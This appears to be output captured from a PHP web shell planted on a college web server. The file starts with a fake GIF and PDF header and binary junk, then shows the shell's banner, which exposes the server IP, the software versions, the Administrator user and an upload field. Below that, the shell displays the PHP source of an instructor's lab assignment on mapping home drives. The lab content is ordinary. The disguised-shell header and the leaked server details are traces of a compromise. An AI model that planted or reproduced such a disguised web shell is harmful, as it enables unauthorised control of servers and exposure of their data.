GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST2274/Labs/Lab09/ |
Upload File : |
<? // JimMartinson/CST2276/Labs/Lab03.6/Lab03.6.phpinc require('Gradebook/EvaluationSubmission_BEGIN.phpinc'); #if ( $_SESSION['userId'] != -1 ) { require('Gradebook/EvaluationSubmission_NOTAVAILABLE.phpinc'); exit; } #$showGenerateComputerNamesVariables = true; require('JimMartinson/CST2276/Labs/GenerateComputerNames.phpinc'); $disabled = ''; $disabled = ' disabled'; $uploadFilename = $courseNumber.'_'.$evaluationName.'_'.$userFileName.'.png'; ?> <fieldset><legend><?=$evaluationType?> <?=$evaluationNumber?> Assignment</legend> <? if ( $disabled ) { ?> <span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><br> <? } ?> The purpose of this lab is to map a home drive for domain users. <br><?=$gradeNote?> <ol class="count"> <li>Create a directory called <b class="copyText"><?=$evaluationName?></b>. We will use it for the screenshot created in this lab.</li> <li>Map a home drive for your <b><?=$userLastName?></b> user. <br><span class="note normal">This step in done on your <?=$serverName ?> Server 2019 VM.</span> </li> <li>Test that the mapping works: <br><span class="note normal">This step in done on your <?=$workstationName?> Windows 10 VM.</span> <ol> <li>Log into your <?=$workstationName?> Windows 10 VM as <b><?=$userLastName?></b></li> <li>Open <b>File Explorer</b> / <b>This PC</b>. <span class="note">You should see the mapped H: drive.</span></li> <li>Take a screenshot of theFile Explorer window and save it as <b class="copyText"><?=$uploadFilename?></b> in your <b><?=$evaluationName?></b> folder. <br><? showBegin('See file explorer example screenshot'); ?><br> <img src="images/example.png" width="786" alt="browser example" style="border:1px solid silver;"><br> <? showEnd (); ?> </li> </ol> </li> <li>Turn in your assignment: <br><span class="note normal">This step in done on your <?=$workstationName?> Windows 10 VM.</span> <ol type="a"> <li>Browse and select your <b><?=$uploadFilename?></b> file: <input type="file" name="fileUpload" id="inpFileUpload"<?=$disabled?>><div id="divFileploadError"></div></li> <li>Then <input type="submit" name="f_subtask" id="inpSubmit" value="Submit"<?=$disabled?>> for grading.<? if ( $disabled ) { ?> <span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?></li> </ol> </li> <? /**/ ?> </ol> <?=$gradeNote?> </fieldset> <? require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced. if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n"; ?>